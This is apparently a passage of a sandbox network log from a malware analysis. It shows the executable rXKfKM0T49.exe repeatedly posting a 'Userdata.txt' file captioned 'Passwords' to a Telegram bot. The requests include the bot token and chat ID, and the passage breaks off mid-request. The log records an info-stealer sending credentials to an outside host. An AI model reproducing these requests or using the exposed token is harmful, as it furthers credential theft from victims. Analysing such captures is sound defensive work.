                                                                                                          2025-01-10 22:12:14 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 37 63 39 30 62 65 65 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3247c90beef3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:14 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:14 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:14 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44794,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547134,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 49998 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:16 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd325ad854f9ca
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:16 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 61 64 38 35 34 66 39 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: --===============8dd325ad854f9caContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:17 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:16 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:17 UTC | 534 | IN | Data Raw: (hex dump omitted)
Data Ascii: {"ok":true,"result":{"message_id":44795,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547136,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 50000 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:18 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd3275fbf52428
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2025-01-10 22:12:18 UTC | 1090 | OUT | Data Raw: (hex dump omitted)
Data Ascii: --===============8dd3275fbf52428Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:18 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:18 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:18 UTC | 534 | IN | Data Raw: (hex dump omitted)
Data Ascii: {"ok":true,"result":{"message_id":44796,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547138,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 50002 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:20 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd3288eb61d7c5
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2025-01-10 22:12:20 UTC | 1090 | OUT | Data Raw: (hex dump omitted)
Data Ascii: --===============8dd3288eb61d7c5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:20 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:20 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:20 UTC | 534 | IN | Data Raw: (hex dump omitted)
Data Ascii: {"ok":true,"result":{"message_id":44797,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547140,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 50004 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:21 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd329a73bbadd4
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2025-01-10 22:12:21 UTC | 1090 | OUT | Data Raw: (hex dump omitted)
Data Ascii: --===============8dd329a73bbadd4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:21 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:21 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:21 UTC | 534 | IN | Data Raw: (hex dump omitted)
Data Ascii: {"ok":true,"result":{"message_id":44798,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547141,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 50006 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:23 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd32aea0643760
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2025-01-10 22:12:23 UTC | 1090 | OUT | Data Raw: (hex dump omitted)
Data Ascii: --===============8dd32aea0643760Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:23 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:23 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:23 UTC | 534 | IN | Data Raw: (hex dump omitted)
Data Ascii: {"ok":true,"result":{"message_id":44799,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547143,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 50008 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:25 UTC | 270 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd32cc1b350f07
Host: api.telegram.org
Content-Length: 1090
2025-01-10 22:12:25 UTC | 1090 | OUT | Data Raw: (hex dump omitted)
Data Ascii: --===============8dd32cc1b350f07Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:26 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:26 GMT
Content-Type: application/json
Content-Length: 535
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:26 UTC | 535 | IN | Data Raw: (hex dump omitted)
Data Ascii: {"ok":true,"result":{"message_id":44800,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547146,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.9 | 50010 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:27 UTC | 270 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd32e17780006a
Host: api.telegram.org
Content-Length: 1090
2025-01-10 22:12:27 UTC | 1090 | OUT | Data Raw: (hex dump omitted)
Data Ascii: --===============8dd32e17780006aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:27 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:27 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:27 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 34 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44801,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547147,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 50012 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:29 UTC | 270 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd32f2c5d2fb99
    Host: api.telegram.org
    Content-Length: 1090
2025-01-10 22:12:29 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 32 63 35 64 32 66 62 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii: --===============8dd32f2c5d2fb99Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:29 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:29 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:29 UTC | 534 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
    Data Ascii: {"ok":true,"result":{"message_id":44802,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547149,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 50014 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:30 UTC | 270 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd33055b4f13ff
    Host: api.telegram.org
    Content-Length: 1090
2025-01-10 22:12:30 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 35 35 62 34 66 31 33 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii: --===============8dd33055b4f13ffContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:30 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:30 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:30 UTC | 534 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
    Data Ascii: {"ok":true,"result":{"message_id":44803,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547150,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.9 | 50016 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:32 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd3317e34e673a
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:32 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 37 65 33 34 65 36 37 33 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii: --===============8dd3317e34e673aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:32 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:32 GMT
    Content-Type: application/json
    Content-Length: 534
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:32 UTC | 534 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
    Data Ascii: {"ok":true,"result":{"message_id":44804,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547152,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.9 | 50018 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:34 UTC | 270 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd332a5d9f9c69
    Host: api.telegram.org
    Content-Length: 1090
